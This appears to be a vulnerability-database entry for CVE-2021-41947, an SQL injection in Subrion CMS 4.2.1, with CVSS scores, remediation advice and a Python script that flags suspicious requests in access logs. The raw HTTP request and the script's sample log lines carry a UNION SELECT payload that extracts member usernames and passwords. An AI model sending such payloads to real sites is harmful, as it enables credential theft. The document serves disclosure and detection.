Attacker Value
Moderate
(1 user assessed)
Exploitability
Low
(1 user assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network

CVE-2021-41947

Disclosure Date: October 08, 2021
MITRE ATT&CK tactic: Credential Access

Description

A SQL injection vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.

Technical Analysis

CVE-2021-41947

Description:

A SQL statement in request parameter vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.
This application should not incorporate any user-controllable data directly into SQL queries.
Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries.
In no circumstances should users be able to control or modify the structure of the SQL query itself.

MySQL Request:

GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1
Host: 192.168.1.4
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Sat, 16 Oct 2021 16:40:30 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/
Content-Length: 72
Connection: close
Content-Type: application/json

{"error":true,"message":"Action is forbidden.","code":403,"result":true}

Risk:

  • Medium

Reproduce:

href

Proof

href
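
As an added example (not part of the assessment above and not Subrion's own code), the following Python script triages web access logs for requests to the /panel/visual-mode.json endpoint whose type parameter decodes to anything other than a plain identifier, as in the request quoted above. The log lines, the function names and the assumption that legitimate type values are simple identifiers such as blocks are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/panel/visual-mode.json"       # path taken from the request quoted above
IDENTIFIER = re.compile(r"[A-Za-z0-9_]+")  # assumption: valid `type` values look like `blocks`
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed Apache-style log lines; the second reuses the request shown on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Oct/2021:16:40:01 +0000] "GET /panel/visual-mode.json?get=access&type=blocks&object=landing_what_is_this&page=index HTTP/1.1" 200 72',
    '192.0.2.66 - - [16/Oct/2021:16:40:30 +0000] "GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1" 200 72',
    '192.0.2.66 - - [16/Oct/2021:16:41:02 +0000] "GET /panel/visual-mode.json?get=access&type=blocks%2527 HTTP/1.1" 200 72',
    '192.0.2.10 - - [16/Oct/2021:16:41:10 +0000] "GET /index.html?type=a%27b HTTP/1.1" 200 512',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalized before checking."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_requests(lines):
    """Return (client_ip, decoded_type) for endpoint hits whose `type` is not an identifier."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if url.path != ENDPOINT:
            continue  # only the endpoint named in the advisory is in scope
        # parse_qs decodes once; fully_decode handles any further encoding layers
        for raw in parse_qs(url.query, keep_blank_values=True).get("type", []):
            value = fully_decode(raw)
            if not IDENTIFIER.fullmatch(value):
                findings.append((m.group("ip"), value))
    return findings

if __name__ == "__main__":
    for ip, value in flag_requests(SAMPLE_LOG):
        print(f"{ip}: suspicious type value {value!r}")
```

The same identifier check can serve as server-side input validation for type, alongside the parameterized queries the assessment recommends.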

CVSS V3 Severity and Metrics
Base Score:
7.2 High
Impact Score:
5.9
Exploitability Score:
1.2
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • intelliants

Products

  • subrion cms 4.2.1
